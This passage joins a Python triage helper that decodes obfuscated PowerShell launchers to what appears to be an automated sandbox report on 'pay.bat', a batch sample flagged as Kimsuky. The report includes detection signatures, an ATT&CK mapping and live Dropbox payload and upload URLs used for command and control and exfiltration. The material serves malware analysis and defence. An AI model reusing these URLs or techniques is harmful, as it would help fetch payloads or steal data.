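    positional {n} holes, which str.format reproduces for index-only templates."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        raise ValueError("no '...' -f '...' expression found")
    template, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))
    return template.format(*args)


def decode_payload(blob):
    """Decode the blob the way the launcher does; return (text, warnings)."""
    warnings = []
    if any(c.isalpha() for c in blob) and blob == blob.lower():
        warnings.append("blob is all lower-case: base64 is case-sensitive, so this copy "
                        "was case-folded by the report and will not decode to the script")
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error as exc:
        return "", warnings + ["base64 error: %s" % exc]
    try:
        return raw.decode("utf-8"), warnings
    except UnicodeDecodeError:
        return "", warnings + ["decoded bytes are not UTF-8"]


def triage_launcher(cmdline):
    """Pull the facts an analyst wants from one process-creation line:
    the real cmdlet, the evasion switches, and the decoded payload."""
    m = B64_RE.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    payload, warnings = decode_payload(m.group(1))
    flags = sorted({" ".join(f.split()).lower() for f in FLAG_RE.findall(cmdline)})
    return {
        "cmdlet": resolve_format_operator(cmdline),
        "flags": flags,
        "payload": payload,
        "warnings": warnings,
    }


if __name__ == "__main__":
    original = build_launcher(STAND_IN_PAYLOAD)
    print(triage_launcher(original))
    # The case-folded copy in the report: cmdlet and switches still resolve,
    # the payload does not.
    print(triage_launcher(original.lower())["warnings"])
```

When working from a report like this one, take the blob from a mixed-case copy of the command line (the raw process tree or the dropped .bat itself), never from a lower-cased signature hit.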
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (4 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (9 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (9 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (13 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (8 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 consecutive identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: powershell.exe, 00000003.00000002.1968184626.0000019FD32E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970418937.0000019FD3351000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1966047101.0000019FD2FD4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Roaming\system_first.ps1, type: DROPPED
                Source: Yara match | File source: C:\Users\user\AppData\Roaming\temp.ps1, type: DROPPED

                Remote Access Functionality

                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Roaming\system_first.ps1, type: DROPPED
                Source: Yara match | File source: C:\Users\user\AppData\Roaming\temp.ps1, type: DROPPED
Tactic | Techniques (number of matching signatures in parentheses)
Reconnaissance | Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development | Scripting (1), Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access | Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution | Windows Management Instrumentation (12), Command and Scripting Interpreter (1), PowerShell (2), Cron, Launchd, Scheduled Task
Persistence | Scripting (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation | Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion | Masquerading (1), Virtualization/Sandbox Evasion (131), Process Injection (11), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1)
Credential Access | OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery | Security Software Discovery (131), Process Discovery (1), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), System Information Discovery (21), Wi-Fi Discovery
Lateral Movement | Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection | Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control | Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (14), Fallback Channels, Multiband Communication
Exfiltration | Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact | Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1563601 | Sample: pay.bat | Start date: 27/11/2024 | Architecture: WINDOWS | Score: 96
  DNS/IP: edge-block-www-env.dropbox-dns.com; edge-block-api-env.dropbox-dns.com; 5 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Yara detected Kimsuky; Suspicious powershell command line found; 5 other signatures
  cmd.exe (1) started
    Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
    powershell.exe (14, 40) started
      DNS/IP: edge-block-www-env.dropbox-dns.com 162.125.65.15, 443, 49730, 49731 DROPBOXUS United States
      DNS/IP: edge-block-api-env.dropbox-dns.com 162.125.69.14, 443, 49734, 49735 DROPBOXUS United States
      DNS/IP: api-env.dropbox-dns.com 162.125.69.19, 443, 49732, 49733 DROPBOXUS United States
      Dropped: C:\Users\user\AppData\...\system_first.ps1, ASCII
      Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module
    conhost.exe started
  powershell.exe (23) started
    Dropped: C:\Users\user\AppData\Roaming\temp.ps1, ASCII
    Signatures: Loading BitLocker PowerShell Module
    conhost.exe started

Source | Detection | Scanner | Label
pay.bat | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://api.dropboxap | 0% | Avira URL Cloud | safe
https://api.drH | 0% | Avira URL Cloud | safe
https://content.dropboxaH | 0% | Avira URL Cloud | safe
https://content.drop | 0% | Avira URL Cloud | safe
http://crl.microsoftz8 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api-env.dropbox-dns.com | 162.125.69.19 | true | false | - | high
edge-block-www-env.dropbox-dns.com | 162.125.65.15 | true | false | - | high
edge-block-api-env.dropbox-dns.com | 162.125.69.14 | true | false | - | high
dl.dropboxusercontent.com | unknown | unknown | false | - | high
api.dropboxapi.com | unknown | unknown | false | - | high
content.dropboxapi.com | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 | false | - | high
https://api.dropboxapi.com/oauth2/token | false | - | high
https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 | false | - | high
https://content.dropboxapi.com/2/files/upload | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://content.dropboxaH | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://content.dropboxapi.com/2/files/uploadp | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://edge-block-api-env.dropbox-dns.com | powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent | powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://dl.dropboxusercontent.com | powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.drH | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000002.00000002.1821493344.000002C3DBA0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.dropboxapi.com | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://content.dropboxapi.com | powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.dropboxapi.com/oauth2/top | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://api-env.dropbox-dns.com | powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dl.dropboxusercontent.com/scl/fi/g7mcsh | powershell.exe, 00000002.00000002.1821493344.000002C3DADD6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dropboxusercontent.com/ | powershell.exe, 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiy | powershell.exe, 00000002.00000002.1821493344.000002C3DA8D2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://content.dropboxapi.com | powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.dropboxapi.com/oaup | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://content.dropboxapi.com/2/files/uplop | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk | powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp, chrome.ps1.2.dr | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.dropboxap | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://content.drop | powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, system_first.ps1.2.dr, temp.ps1.3.dr | false | Avira URL Cloud: safe | unknown
http://edge-block-www-env.dropbox-dns.com | powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://content.dropboxapi.com/2/fp | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a | powershell.exe, 00000002.00000002.1821493344.000002C3DAE08000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.dropboxapi.com/oauth2/tokenp | powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/csp_log?policy_name=blockserver-noscript | powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microsoftz8 | powershell.exe, 00000003.00000002.1968058446.0000019FD31A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.dropboxapi.com | powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://dl.dropboxusercontent.com/ | powershell.exe, 00000002.00000002.1821493344.000002C3DAD5D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
